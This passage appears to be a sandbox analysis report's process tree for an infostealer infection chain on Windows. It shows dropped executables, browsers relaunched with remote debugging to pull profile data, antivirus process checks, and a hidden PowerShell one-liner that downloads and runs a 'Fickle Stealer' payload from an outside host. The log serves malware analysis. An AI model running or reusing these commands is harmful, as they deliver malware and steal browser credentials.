        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1748,i,10088706880392395121,849753726388212419,262144 --variations-seed-version --mojo-platform-channel-handle=2640 /prefetch:13
        9⤵
        
        PID:5324
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3468,i,10088706880392395121,849753726388212419,262144 --variations-seed-version --mojo-platform-channel-handle=3528 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:5612
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,10088706880392395121,849753726388212419,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:1
        9⤵
        Uses browser remote debugging
        
        PID:6148
        
        C:\ProgramData\5890hdbiek.exe
        
        "C:\ProgramData\5890hdbiek.exe"
        8⤵
        
        PID:6232
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:2188
        
        C:\ProgramData\vaimy5pp8q.exe
        
        "C:\ProgramData\vaimy5pp8q.exe"
        8⤵
        
        PID:5572
        
        C:\ProgramData\vaimy5pp8q.exe
        
        "C:\ProgramData\vaimy5pp8q.exe"
        9⤵
        
        PID:6416
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe"
        10⤵
        
        PID:6424
        
        C:\Users\Admin\AppData\Local\x1TG3PXn9bpr.exe
        
        "C:\Users\Admin\AppData\Local\x1TG3PXn9bpr.exe"
        10⤵
        
        PID:8888
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:9296
        
        C:\Users\Admin\AppData\Local\Kkb2zsnPdgsH.exe
        
        "C:\Users\Admin\AppData\Local\Kkb2zsnPdgsH.exe"
        10⤵
        
        PID:9732
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:9748
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:9768
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        12⤵
        Uses browser remote debugging
        
        PID:31968
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9c37bdcf8,0x7ff9c37bdd04,0x7ff9c37bdd10
        13⤵
        
        PID:31992
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        12⤵
        Uses browser remote debugging
        
        PID:25028
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9c37bdcf8,0x7ff9c37bdd04,0x7ff9c37bdd10
        13⤵
        
        PID:6696
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        12⤵
        Uses browser remote debugging
        
        PID:19896
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9c3a0dcf8,0x7ff9c3a0dd04,0x7ff9c3a0dd10
        13⤵
        
        PID:19048
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        12⤵
        Uses browser remote debugging
        
        PID:25896
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9c3a0dcf8,0x7ff9c3a0dd04,0x7ff9c3a0dd10
        13⤵
        
        PID:25556
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        12⤵
        Uses browser remote debugging
        
        PID:5692
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0x80,0x108,0x7ff9c3a0dcf8,0x7ff9c3a0dd04,0x7ff9c3a0dd10
        13⤵
        
        PID:11108
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        12⤵
        Uses browser remote debugging
        
        PID:30960
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9c796dcf8,0x7ff9c796dd04,0x7ff9c796dd10
        13⤵
        
        PID:19168
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1416,i,10019618779273978834,2669214154608812235,262144 --variations-seed-version --mojo-platform-channel-handle=2600 /prefetch:11
        13⤵
        
        PID:12224
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2396,i,10019618779273978834,2669214154608812235,262144 --variations-seed-version --mojo-platform-channel-handle=2392 /prefetch:2
        13⤵
        
        PID:12152
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2024,i,10019618779273978834,2669214154608812235,262144 --variations-seed-version --mojo-platform-channel-handle=2652 /prefetch:13
        13⤵
        
        PID:25556
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3252,i,10019618779273978834,2669214154608812235,262144 --variations-seed-version --mojo-platform-channel-handle=3272 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:8024
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3292,i,10019618779273978834,2669214154608812235,262144 --variations-seed-version --mojo-platform-channel-handle=3336 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:8032
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4116,i,10019618779273978834,2669214154608812235,262144 --variations-seed-version --mojo-platform-channel-handle=3244 /prefetch:9
        13⤵
        Uses browser remote debugging
        
        PID:26248
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        12⤵
        Uses browser remote debugging
        
        PID:13840
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x264,0x7ff9c67ef208,0x7ff9c67ef214,0x7ff9c67ef220
        13⤵
        
        PID:5664
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1800,i,8107230318343325733,9962287032451411503,262144 --variations-seed-version --mojo-platform-channel-handle=2632 /prefetch:11
        13⤵
        
        PID:19180
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2544,i,8107230318343325733,9962287032451411503,262144 --variations-seed-version --mojo-platform-channel-handle=2540 /prefetch:2
        13⤵
        
        PID:28808
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=1672,i,8107230318343325733,9962287032451411503,262144 --variations-seed-version --mojo-platform-channel-handle=2888 /prefetch:13
        13⤵
        
        PID:20112
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,8107230318343325733,9962287032451411503,262144 --variations-seed-version --mojo-platform-channel-handle=3500 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:19948
        
        C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3460,i,8107230318343325733,9962287032451411503,262144 --variations-seed-version --mojo-platform-channel-handle=3508 /prefetch:1
        13⤵
        Uses browser remote debugging
        
        PID:26240
        
        C:\Users\Admin\AppData\Local\ST6wJ8xlwfGd.exe
        
        "C:\Users\Admin\AppData\Local\ST6wJ8xlwfGd.exe"
        10⤵
        
        PID:12404
        
        C:\Users\Admin\AppData\Local\Temp\Z5bBdOWE\ovhl2OlXkL12uAFX.exe
        
        C:\Users\Admin\AppData\Local\Temp\Z5bBdOWE\ovhl2OlXkL12uAFX.exe 0
        11⤵
        
        PID:12448
        
        C:\Users\Admin\AppData\Local\Temp\Z5bBdOWE\kP4vDeJEzapilOLE.exe
        
        C:\Users\Admin\AppData\Local\Temp\Z5bBdOWE\kP4vDeJEzapilOLE.exe 12448
        12⤵
        
        PID:18664
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 18664 -s 652
        13⤵
        Program crash
        
        PID:31724
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 12448 -s 684
        12⤵
        Program crash
        
        PID:31684
        
        C:\ProgramData\7q9hdt2d26.exe
        
        "C:\ProgramData\7q9hdt2d26.exe"
        8⤵
        
        PID:6224
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\9yDeq56oZOpbwpXJ.exe
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\9yDeq56oZOpbwpXJ.exe 0
        9⤵
        
        PID:6188
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\7b9SKCzVu47zKQ57.exe
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\7b9SKCzVu47zKQ57.exe 6188
        10⤵
        
        PID:6516
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6516 -s 1072
        11⤵
        Program crash
        
        PID:31532
        
        C:\Users\Admin\AppData\Local\Temp\tGvmlypX\kUlxHf50fDQ3G0hp.exe
        
        C:\Users\Admin\AppData\Local\Temp\tGvmlypX\kUlxHf50fDQ3G0hp.exe 0
        10⤵
        
        PID:5504
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        11⤵
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\7quOGQkc66gfdWMV.exe
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\7quOGQkc66gfdWMV.exe 6188
        10⤵
        
        PID:3808
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3808 -s 1704
        11⤵
        Program crash
        
        PID:26632
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\t0qmsQjEJDuYwP09.exe
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\t0qmsQjEJDuYwP09.exe 6188
        10⤵
        
        PID:7852
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7852 -s 664
        11⤵
        Program crash
        
        PID:23196
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\jnouA6cTfdZ31MuT.exe
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\jnouA6cTfdZ31MuT.exe 6188
        10⤵
        
        PID:20452
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 20452 -s 684
        11⤵
        Program crash
        
        PID:22644
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\Wsn8n5Et1lK7dLj8.exe
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\Wsn8n5Et1lK7dLj8.exe 6188
        10⤵
        
        PID:30484
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 30484 -s 660
        11⤵
        Program crash
        
        PID:3976
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\4cOulk4szSoKRXpI.exe
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\4cOulk4szSoKRXpI.exe 6188
        10⤵
        
        PID:26560
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 26560 -s 520
        11⤵
        Program crash
        
        PID:31460
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\T5A9JfSMfnWMX2Ls.exe
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\T5A9JfSMfnWMX2Ls.exe 6188
        10⤵
        
        PID:24704
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 24704 -s 600
        11⤵
        Program crash
        
        PID:24780
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\V4bJindSftC4vZzV.exe
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\V4bJindSftC4vZzV.exe 6188
        10⤵
        
        PID:28620
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 28620 -s 692
        11⤵
        Program crash
        
        PID:7420
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\noFGQS1o9e1Fj8kZ.exe
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\noFGQS1o9e1Fj8kZ.exe 6188
        10⤵
        
        PID:25788
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 25788 -s 720
        11⤵
        Program crash
        
        PID:10540
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\buhOzoiUAbs6gKW5.exe
        
        C:\Users\Admin\AppData\Local\Temp\lweMk87H\buhOzoiUAbs6gKW5.exe 6188
        10⤵
        
        PID:31132
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 31132 -s 496
        11⤵
        Program crash
        
        PID:16120
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\sriwt" & exit
        8⤵
        
        PID:6196
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 11
        9⤵
        Delays execution with timeout.exe
        
        PID:6700
      - C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex12312321.exe"
        6⤵
        
        PID:5332
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5148
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:6100
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5296
      - C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
        6⤵
        
        PID:5632
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:5368
      - C:\Users\Admin\AppData\Local\Temp\10046340101\ca6f1aea2b.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046340101\ca6f1aea2b.exe"
        6⤵
        
        PID:6452
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c copy Bc.wbk Bc.wbk.bat & Bc.wbk.bat
        7⤵
        
        PID:6548
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:31504
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        
        PID:31560
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        
        PID:27284
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        
        PID:27188
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 674187
        8⤵
        
        PID:27724
      - C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10047850101\crypted.exe"
        6⤵
        
        PID:6756
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        
        PID:6824
      - C:\Users\Admin\AppData\Local\Temp\10053710101\121e9cefab.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053710101\121e9cefab.exe"
        6⤵
        
        PID:560
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053710101\121e9cefab.exe"
        7⤵
        
        PID:1356
      - C:\Users\Admin\AppData\Local\Temp\10053720101\7abb71a5b6.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053720101\7abb71a5b6.exe"
        6⤵
        
        PID:3788
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10053720101\7abb71a5b6.exe"
        7⤵
        
        PID:2820
  - - C:\Users\Admin\AppData\Local\Temp\10475710101\AfkeY2q.exe
      "C:\Users\Admin\AppData\Local\Temp\10475710101\AfkeY2q.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:6032
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        5⤵
        
        PID:5772
  - - C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe
      "C:\Users\Admin\AppData\Local\Temp\10477200101\mtCxnCB.exe"
      4⤵
      PID:5516
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\10479800141\pDmELXs.ps1"
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3968
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -win Hidden -Command "Invoke-Command -ScriptBlock ([scriptblock]::Create((Invoke-RestMethod -Uri 'https://client-telemetry.com/hH773j/payload/fickle/payload.ps1')))"
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6260
      - C:\Users\Admin\AppData\Local\Temp\Fickle Stealer\Browser Data\program.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Fickle Stealer\Browser Data\program.exe"
        6⤵
        
        PID:5336
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:25000
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data"
        7⤵
        Uses browser remote debugging
        
        PID:25212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c37bdcf8,0x7ff9c37bdd04,0x7ff9c37bdd10
        8⤵
        
        PID:2120
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2396,i,4682942527204264063,10072899293702120945,262144 --disable-features=PaintHolding --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2392 /prefetch:11
        8⤵
        
        PID:4924
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2304,i,4682942527204264063,10072899293702120945,262144 --disable-features=PaintHolding --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2292 /prefetch:2
        8⤵
        
        PID:25132
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2664,i,4682942527204264063,10072899293702120945,262144 --disable-features=PaintHolding --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2680 /prefetch:13
        8⤵
        
        PID:2056
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
